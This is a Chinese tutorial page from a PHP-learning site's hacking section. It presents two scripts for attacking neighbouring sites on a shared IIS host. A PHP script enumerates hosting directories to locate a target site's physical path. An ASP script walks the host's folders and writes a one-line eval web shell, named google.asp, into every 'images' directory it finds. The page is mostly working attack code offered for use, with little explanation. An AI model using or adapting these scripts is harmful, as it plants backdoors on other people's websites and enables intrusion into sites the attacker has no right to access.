网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

一个找二层目录的小东东 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 碰到个虚拟主机,iis7 0 里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件 如果能得到目标站的物理目录,能立马搞定 但是想尽一切办法,也没找到物理路径 所以只有用脚...

碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的.

 

<?php

 set_time_limit(0);

$path = 'D:/Hosting';



$somefile = $_GET['key'];

$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';





  if (!isset($_SERVER['PHP_AUTH_USER'])) {

    header('WWW-Authenticate: Basic realm="My Realm"');

    header('HTTP/1.0 401 Unauthorized');

    echo 'Text to send if user hits Cancel button';

    exit;

  } else {

    

 

if(is_dir($path) && is_readable($path))

{

$path2 = '';

$handle = opendir($path);

while(false !== ($filename = readdir($handle)))

{

if($filename{0} != $_GET['dir'])

{

continue;

}



/*

if($filename{1} != $_GET['two'])

{

continue;

}

              */



//$path2 = $path.'/'.$filename.'/html';



               $path2 = $path.'/'.$filename;

if(is_dir($path2) && is_readable($path2))

{

@$handle2 = opendir($path2);

while(false !== ($filename2 = readdir($handle2)))

{



if($filename2 == $somefile)

{

//echo'[+]Found !'.$filename2."\n";

file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);

}



}

@closedir($handle2);



}

}

file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);

closedir($handle);

}





   }







<%

Server.ScriptTimeout=500000000

key = Trim(Request.QueryString("key"))

msg=" <% eval(rquese(Chr(35)))%" &">"

Set FSO=Server.CreateObject("Scripting.FileSystemObject")

Set ServerFolder=FSO.GetFolder("C:\intel")

Set ServerFolderList=ServerFolder.subfolders







For Each ServerFileEvery IN ServerFolderList

  

 ' Response.write  ServerFileEvery&"</br>"




If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then

Set sServerFolder=FSO.GetFolder(ServerFileEvery)

Set sServerFolderList=sServerFolder.subfolders




For Each sServerFileEvery IN sServerFolderList




If LCase(sServerFileEvery.name) = "images" Then




StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"




End If




Next




End If

Next







 Function StreamSaveToFile(sPath, sContent, sCharSet)




Dim oStream




If(InStr(sPath, ":") <= 0)Then

sPath = Replace(sPath, ",", ",")

sPath = Server.MapPath(sPath)

sPath = Replace(sPath, ",", ",")

End If




Set oStream = Server.CreateObject("Adodb.Stream")

With oStream

.Type = 2

.Mode = 3

.Open

.Charset = sCharSet

.WriteText sContent

.SaveToFile sPath, 2

.Close

End With




Set oStream = Nothing




End Function




%>

 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论